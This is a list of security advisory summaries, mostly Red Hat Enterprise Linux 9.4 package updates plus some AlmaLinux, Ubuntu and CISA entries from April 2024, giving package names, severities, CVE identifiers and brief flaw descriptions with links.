29.04.2024 10:51:17almalinux[ALSA-2024:1962] go-toolset:rhel8 security update (important)go-toolset:rhel8 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1962
29.04.2024 10:54:15almalinux[ALSA-2024:1998] libreswan security update (moderate)libreswan security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1998
29.04.2024 10:53:24almalinux[ALSA-2024:1963] golang security update (important)golang security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1963
29.04.2024 10:46:06almalinux[ALSA-2024:1939] thunderbird security update (low)thunderbird security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1939
29.04.2024 10:48:43almalinux[ALSA-2024:1940] thunderbird security update (low)thunderbird security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1940
29.04.2024 14:02:39almalinux[ALSA-2024:1822] java-11-openjdk security update (moderate)java-11-openjdk security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1822
29.04.2024 14:04:52almalinux[ALSA-2024:1828] java-21-openjdk security update (moderate)java-21-openjdk security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1828
01.05.2024 01:40:45ubuntu[USN-6760-1] Gerbv vulnerability (medium)Gerbv could be made to crash if it opened a specially crafted input file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6760-1
30.04.2024 13:50:09ubuntu[USN-6758-1] JSON5 vulnerability (high)JSON5 could allow unintended access to network services or have other unspecified impact.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6758-1
30.04.2024 10:33:26ubuntu[USN-6761-1] Anope vulnerabilityAnope could be made to bypass authentication checks for suspended accounts.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6761-1
30.04.2024 03:00:00cisa[CISA-2024:0430] CISA Adds One Known Exploited Vulnerability to Catalog (high)CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0430
30.04.2024 03:00:00redhat[RHSA-2024:2137] LibRaw security update (low)
LibRaw is a library for reading RAW files obtained from digital photo cameras (CRW/CR2, NEF, RAF, DNG, and others).

Security Fix(es):
* LibRaw: a heap-buffer-overflow in raw2image_ex() (CVE-2023-1729)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2137
30.04.2024 03:00:00redhat[RHSA-2024:2146] libXpm security update (moderate)
X.Org X11 libXpm runtime library.

Security Fix(es):
* libXpm: out of bounds read in XpmCreateXpmImageFromBuffer() (CVE-2023-43788)
* libXpm: out of bounds read on XPM with corrupted colormap (CVE-2023-43789)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2146
30.04.2024 03:00:00redhat[RHSA-2024:2147] ipa security update (moderate)
Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments.

Security Fix(es):
* freeipa: specially crafted HTTP requests potentially lead to denial of service (CVE-2024-1481)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2147
30.04.2024 03:00:00 | redhat | [RHSA-2024:2159] python3.11-urllib3 security update (moderate) | The python-urllib3 package provides the Python HTTP module with connection pooling and file POST abilities. Security Fix(es): * python-urllib3: Cookie request header isn't stripped during cross-origin redirects (CVE-2023-43804) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2159
30.04.2024 03:00:00 | redhat | [RHSA-2024:2184] libsndfile security update (moderate) | libsndfile is a C library for reading and writing files containing sampled sound, such as AIFF, AU, or WAV. Security Fix(es): * libsndfile: integer overflow in src/mat4.c and src/au.c leads to DoS (CVE-2022-33065) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2184
30.04.2024 03:00:00 | redhat | [RHSA-2024:2211] tcpdump security update (moderate) | The tcpdump packages contain the tcpdump utility for monitoring network traffic. The tcpdump utility can capture and display the packet headers on a particular network interface or on all interfaces. Security Fix(es): * tcpslice: use-after-free in extract_slice() (CVE-2021-41043) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2211
30.04.2024 03:00:00 | redhat | [RHSA-2024:2228] perl security update (moderate) | Perl is a high-level programming language that is commonly used for system administration utilities and web programming. Security Fix(es): * perl: Write past buffer end via illegal user-defined Unicode property (CVE-2023-47038) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2228
30.04.2024 03:00:00 | redhat | [RHSA-2024:2239] skopeo security update (moderate) | The skopeo command lets you inspect images from container image registries, get images and image layers, and use signatures to create and verify files. Security Fix(es): * golang: crypto/tls: Timing Side Channel attack in RSA based TLS key exchanges (CVE-2023-45287) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2239
30.04.2024 03:00:00 | redhat | [RHSA-2024:2246] ansible-core bug fix, enhancement, and security update (moderate) | Ansible is a radically simple model-driven configuration management, multi-node deployment, and remote task execution system. Ansible works over SSH and does not require any software or daemons to be installed on remote nodes. Extension modules can be written in any language and are transferred to managed machines automatically. Security Fix(es): * ansible-core: possible information leak in tasks that ignore ANSIBLE_NO_LOG configuration (CVE-2024-0690) Bug Fix(es): * Update ansible-core to 2.14.14 (JIRA:RHEL-23783) | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2246
30.04.2024 03:00:00 | redhat | [RHSA-2024:2276] qt5-qtbase security update (moderate) | Qt is a software toolkit for developing applications. The qt5-base packages contain base tools for string, xml, and network handling in Qt. Security Fix(es): * qt: incorrect integer overflow check (CVE-2023-51714) * qtbase: potential buffer overflow when reading KTX images (CVE-2024-25580) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2276
30.04.2024 03:00:00 | redhat | [RHSA-2024:2278] httpd security update (moderate) | The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server. Security Fix(es): * httpd: mod_macro: out-of-bounds read vulnerability (CVE-2023-31122) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2278
30.04.2024 03:00:00 | redhat | [RHSA-2024:2353] mingw components security update (moderate) | MinGW (Minimalist GNU for Windows) is a free and open source software development environment to create Microsoft Windows applications. Security Fix(es): * binutils: Heap-buffer-overflow binutils-gdb/bfd/libbfd.c in bfd_getl64 (CVE-2023-1579) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2353
30.04.2024 03:00:00 | redhat | [RHSA-2024:2377] zziplib security update (moderate) | zziplib is a lightweight library to easily extract data from zip files. Security Fix(es): * zziplib: invalid memory access at zzip_disk_entry_to_file_header in mmapped.c (CVE-2020-18770) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2377
30.04.2024 03:00:00 | redhat | [RHSA-2024:2113] pcs security update (moderate) | The pcs packages provide a command-line configuration system for the Pacemaker and Corosync utilities. Security Fix(es): * rubygem-rack: Denial of Service Vulnerability in Rack Content-Type Parsing (CVE-2024-25126) * rubygem-rack: Possible DoS Vulnerability with Range Header in Rack (CVE-2024-26141) * rubygem-rack: Possible Denial of Service Vulnerability in Rack Header Parsing (CVE-2024-26146) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2113
30.04.2024 03:00:00 | redhat | [RHSA-2024:2119] Image builder components bug fix, enhancement and security update (moderate) | Image Builder is a service for building customized OS artifacts, such as VM images and OSTree commits, that uses osbuild under the hood. Security Fix(es): * osbuild-composer: race condition may disable GPG verification for package repositories (CVE-2024-2307) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2119
30.04.2024 03:00:00 | redhat | [RHSA-2024:2126] webkit2gtk3 security update (important) | WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Security Fix(es): * webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2023-40414) * webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2023-42852) * webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2024-23213) * webkitgtk: Processing a file may lead to a denial of service or potentially disclose memory contents (CVE-2014-1745) * webkitgtk: User password may be read aloud by a text-to-speech accessibility feature (CVE-2023-32359) * webkitgtk: use-after-free in the MediaRecorder API of the WebKit GStreamer-based ports (CVE-2023-39928) * webkitgtk: Processing web content may lead to a denial of service (CVE-2023-41983) * webkitgtk: processing a malicious image may lead to a denial of service (CVE-2023-42883) * webkitgtk: processing malicious web content may lead to arbitrary code execution (CVE-2023-42890) * webkitgtk: A maliciously crafted webpage may be able to fingerprint the user (CVE-2024-23206) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2126
30.04.2024 03:00:00 | redhat | [RHSA-2024:2132] fence-agents security and bug fix update (moderate) | The fence-agents packages provide a collection of scripts for handling remote power management for cluster devices. They allow failed or unreachable nodes to be forcibly restarted and removed from the cluster. Security Fix(es): * urllib3: Request body not stripped after redirect from 303 status changes request method to GET (CVE-2023-45803) * pycryptodome: side-channel leakage for OAEP decryption in PyCryptodome and pycryptodomex (CVE-2023-52323) * jinja2: HTML attribute injection when passing user input as keys to xmlattr filter (CVE-2024-22195) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2132
30.04.2024 03:00:00 | redhat | [RHSA-2024:2135] qemu-kvm security update (moderate) | Kernel-based Virtual Machine (KVM) is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm packages provide the user-space component for running virtual machines that use KVM. Security Fix(es): * QEMU: e1000e: heap use-after-free in e1000e_write_packet_to_guest() (CVE-2023-3019) * QEMU: VNC: infinite loop in inflate_buffer() leads to denial of service (CVE-2023-3255) * QEMU: improper IDE controller reset can lead to MBR overwrite (CVE-2023-5088) * QEMU: VNC: NULL pointer dereference in qemu_clipboard_request() (CVE-2023-6683) * QEMU: am53c974: denial of service due to division by zero (CVE-2023-42467) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2135
30.04.2024 03:00:00 | redhat | [RHSA-2024:2410] harfbuzz security update (moderate) | HarfBuzz is an implementation of the OpenType Layout engine. Security Fix(es): * harfbuzz: allows attackers to trigger O(n^2) growth via consecutive marks (CVE-2023-25193) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2410
30.04.2024 03:00:00 | redhat | [RHSA-2024:2437] exfatprogs security update (moderate) | The exfatprogs package contains utilities for formatting and repairing exFAT filesystems. Security Fix(es): * exfatprogs: exfatprogs allows out-of-bounds memory access (CVE-2023-45897) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2437
30.04.2024 03:00:00 | redhat | [RHSA-2024:2438] pam security update (moderate) | Pluggable Authentication Modules (PAM) provide a system to set up authentication policies without the need to recompile programs to handle authentication. Security Fix(es): * pam: allowing unprivileged user to block another user namespace (CVE-2024-22365) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2438
30.04.2024 03:00:00 | redhat | [RHSA-2024:2145] libX11 security update (moderate) | The libX11 packages contain the core X11 protocol client library. Security Fix(es): * libX11: out-of-bounds memory access in _XkbReadKeySyms() (CVE-2023-43785) * libX11: stack exhaustion from infinite recursion in PutSubImage() (CVE-2023-43786) * libX11: integer overflow in XCreateImage() leading to a heap overflow (CVE-2023-43787) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2145
30.04.2024 03:00:00 | redhat | [RHSA-2024:2156] frr security update (moderate) | FRRouting is free software that manages TCP/IP based routing protocols. It supports BGP4, OSPFv2, OSPFv3, ISIS, RIP, RIPng, PIM, NHRP, PBR, EIGRP and BFD. Security Fix(es): * frr: incorrect length check in bgp_capability_llgr() can lead to DoS (CVE-2023-31489) * frr: missing length check in bgp_attr_psid_sub() can lead to DoS (CVE-2023-31490) * frr: processes invalid NLRIs if attribute length is zero (CVE-2023-41358) * frr: out of bounds read in bgp_attr_aigp_valid (CVE-2023-41359) * frr: NULL pointer dereference in bgp_nlri_parse_flowspec() in bgpd/bgp_flowspec.c (CVE-2023-41909) * frr: mishandled malformed data leading to a crash (CVE-2023-46752) * frr: crafted BGP UPDATE message leading to a crash (CVE-2023-46753) * frr: ahead-of-stream read of ORF header (CVE-2023-41360) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2156
30.04.2024 03:00:00 | redhat | [RHSA-2024:2160] toolbox security update (moderate) | Toolbox is a tool for Linux operating systems, which allows the use of containerized command line environments. It is built on top of Podman and other standard container technologies from OCI. Security Fix(es): * golang: html/template: improper handling of HTML-like comments within script contexts (CVE-2023-39318) * golang: html/template: improper handling of special tags within script contexts (CVE-2023-39319) * golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2160
30.04.2024 03:00:00 | redhat | [RHSA-2024:2169] xorg-x11-server security update (moderate) | X.Org is an open-source implementation of the X Window System. It provides the basic low-level functionality that full-fledged graphical user interfaces are designed upon. Security Fix(es): * xorg-x11-server: Out-of-bounds write in XIChangeDeviceProperty/RRChangeOutputProperty (CVE-2023-5367) * xorg-x11-server: out-of-bounds memory reads/writes in XKB button actions (CVE-2023-6377) * xorg-x11-server: out-of-bounds memory read in RRChangeOutputProperty and RRChangeProviderProperty (CVE-2023-6478) * xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer (CVE-2023-6816) * xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (CVE-2024-0229) * xorg-x11-server: SELinux unlabeled GLX PBuffer (CVE-2024-0408) * xorg-x11-server: SELinux context corruption (CVE-2024-0409) * xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (CVE-2024-21885) * xorg-x11-server: heap buffer overflow in DisableDevice (CVE-2024-21886) * xorg-x11-server: Use-after-free bug in DestroyWindow (CVE-2023-5380) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2169
30.04.2024 03:00:00 | redhat | [RHSA-2024:2170] xorg-x11-server-Xwayland security update (moderate) | Xwayland is an X server for running X clients under Wayland. Security Fix(es): * xorg-x11-server: Out-of-bounds write in XIChangeDeviceProperty/RRChangeOutputProperty (CVE-2023-5367) * xorg-x11-server: out-of-bounds memory reads/writes in XKB button actions (CVE-2023-6377) * xorg-x11-server: out-of-bounds memory read in RRChangeOutputProperty and RRChangeProviderProperty (CVE-2023-6478) * xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer (CVE-2023-6816) * xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (CVE-2024-0229) * xorg-x11-server: SELinux unlabeled GLX PBuffer (CVE-2024-0408) * xorg-x11-server: SELinux context corruption (CVE-2024-0409) * xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (CVE-2024-21885) * xorg-x11-server: heap buffer overflow in DisableDevice (CVE-2024-21886) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2170
30.04.2024 03:00:00 | redhat | [RHSA-2024:2483] traceroute security update (moderate) | The traceroute utility displays the route used by IP packets on their way to a specified network (or Internet) host. Security Fix(es): * traceroute: improper command line parsing (CVE-2023-46316) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2483
30.04.2024 03:00:00 | redhat | [RHSA-2024:2525] mingw-pixman security update (moderate) | Pixman is a pixel manipulation library for the X Window System and Cairo. Security Fix(es): * pixman: Integer overflow in pixman_sample_floor_y leading to heap out-of-bounds write (CVE-2022-44638) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2525
30.04.2024 03:00:00 | redhat | [RHSA-2024:2180] runc security update (moderate) | The runC tool is a lightweight, portable implementation of the Open Container Format (OCF) that provides container runtime. Security Fix(es): * golang: io/fs: stack exhaustion in Glob (CVE-2022-30630) * golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631) * golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632) * golang: crypto/tls: Timing Side Channel attack in RSA based TLS key exchanges (CVE-2023-45287) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2180
30.04.2024 03:00:00 | redhat | [RHSA-2024:2193] podman security update (moderate) | The podman tool manages pods, container images, and containers. It is part of the libpod library, which is for applications that use container pods. Container pods are a concept in Kubernetes. Security Fix(es): * golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326) * golang: crypto/tls: Timing Side Channel attack in RSA based TLS key exchanges (CVE-2023-45287) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2193
30.04.2024 03:00:00 | redhat | [RHSA-2024:2199] pmix security update (important) | The Process Management Interface (PMI) provides process management functions for MPI implementations. PMI Exascale (PMIx) provides an extended version of the PMI standard specifically designed to support clusters up to and including exascale sizes. Security Fix(es): * pmix: race condition allows attackers to obtain ownership of arbitrary files (CVE-2023-41915) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2199
30.04.2024 03:00:00 | redhat | [RHSA-2024:2204] libnbd security update (moderate) | Network Block Device (NBD) is a protocol for accessing Block Devices (hard disks and disk-like devices) over a Network. libnbd is a userspace client library for writing NBD clients. Security Fix(es): * libnbd: Malicious NBD server may crash libnbd (CVE-2023-5871) * libnbd: Crash or misbehaviour when NBD server returns an unexpected block size (CVE-2023-5215) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2204
30.04.2024 03:00:00 | redhat | [RHSA-2024:2208] freerdp security update (moderate) | FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. The xfreerdp client can connect to RDP servers such as Microsoft Windows machines, xrdp, and VirtualBox. Security Fix(es): * freerdp: Incorrect offset calculation leading to DOS (CVE-2023-39350) * freerdp: Null Pointer Dereference leading to DOS in RemoteFX (CVE-2023-39351) * freerdp: invalid offset validation leading to Out Of Bound Write (CVE-2023-39352) * freerdp: missing offset validation leading to Out-of-Bounds Read in gdi_multi_opaque_rect (CVE-2023-39356) * freerdp: Integer overflow leading to out-of-bound write vulnerability in gdi_CreateSurface (CVE-2023-40186) * freerdp: Out-of-bounds write in clear_decompress_bands_data (CVE-2023-40567) * freerdp: Out-of-bounds write in the `progressive_decompress` function due to incorrect calculations (CVE-2023-40569) * freerdp: buffer overflow in ncrush_decompress causes crash with crafted input (CVE-2023-40589) * freerdp: missing offset validation leading to Out Of Bound Read (CVE-2023-39353) * freerdp: Out-Of-Bounds Read in nsc_rle_decompress_data (CVE-2023-39354) * freerdp: integer underflow leading to Out-Of-Bound Read in zgfx_decompress_segment (CVE-2023-40181) * freerdp: Out-of-bounds read in general_LumaToYUV444 (CVE-2023-40188) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2208
30.04.2024 03:00:00 | redhat | [RHSA-2024:2550] buildah bug fix update (moderate) | The buildah package provides a tool for facilitating building OCI container images. Among other things, buildah enables you to: Create a working container, either from scratch or using an image as a starting point; Create an image, either from a working container or using the instructions in a Dockerfile; Build both Docker and OCI images. Bug Fix(es): * TRIAGE CVE-2024-24786 buildah: golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON [rhel-9] RHEL9.4 0Day (JIRA:RHEL-28230) | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2550
30.04.2024 03:00:00 | redhat | [RHSA-2024:2559] python-jwcrypto security update (moderate) | The python-jwcrypto package provides Python implementations of the JSON Web Key (JWK), JSON Web Signature (JWS), JSON Web Encryption (JWE), and JSON Web Token (JWT) JOSE (JSON Object Signing and Encryption) standards. Security Fix(es): * python-jwcrypto: malicious JWE token can cause denial of service (CVE-2024-28102) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2559
30.04.2024 03:00:00 | redhat | [RHSA-2024:2564] mod_http2 security update (moderate) | The mod_h2 Apache httpd module implements the HTTP2 protocol (h2+h2c) on top of libnghttp2 for httpd 2.4 servers. Security Fix(es): * mod_http2: httpd: CONTINUATION frames DoS (CVE-2024-27316) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2564
30.04.2024 03:00:00 | redhat | [RHSA-2024:2213] pcp security update (moderate) | Performance Co-Pilot (PCP) is a suite of tools, services, and libraries for acquisition, archiving, and analysis of system-level performance measurements. Its light-weight distributed architecture makes it particularly well-suited to centralized analysis of complex systems. Security Fix(es): * pcp: unsafe use of directories allows pcp to root privilege escalation (CVE-2023-6917) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2213
30.04.2024 03:00:00 | redhat | [RHSA-2024:2217] motif security update (moderate) | The motif packages include the Motif shared libraries needed to run applications which are dynamically linked against Motif, as well as MWM, the Motif Window Manager. Security Fix(es): * libXpm: out of bounds read in XpmCreateXpmImageFromBuffer() (CVE-2023-43788) * libXpm: out of bounds read on XPM with corrupted colormap (CVE-2023-43789) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2217
30.04.2024 03:00:00 | redhat | [RHSA-2024:2236] libvirt security update (moderate) | The libvirt library contains a C API for managing and interacting with the virtualization capabilities of Linux and other operating systems. In addition, libvirt provides tools for remote management of virtualized systems. Security Fix(es): * libvirt: NULL pointer dereference in udevConnectListAllInterfaces() (CVE-2024-2496) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2236
30.04.2024 03:00:00 | redhat | [RHSA-2024:2245] buildah security update (moderate) | The buildah package provides a tool for facilitating building OCI container images. Among other things, buildah enables you to: Create a working container, either from scratch or using an image as a starting point; Create an image, either from a working container or using the instructions in a Dockerfile; Build both Docker and OCI images. Security Fix(es): * golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326) * golang: crypto/tls: Timing Side Channel attack in RSA based TLS key exchanges (CVE-2023-45287) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2245
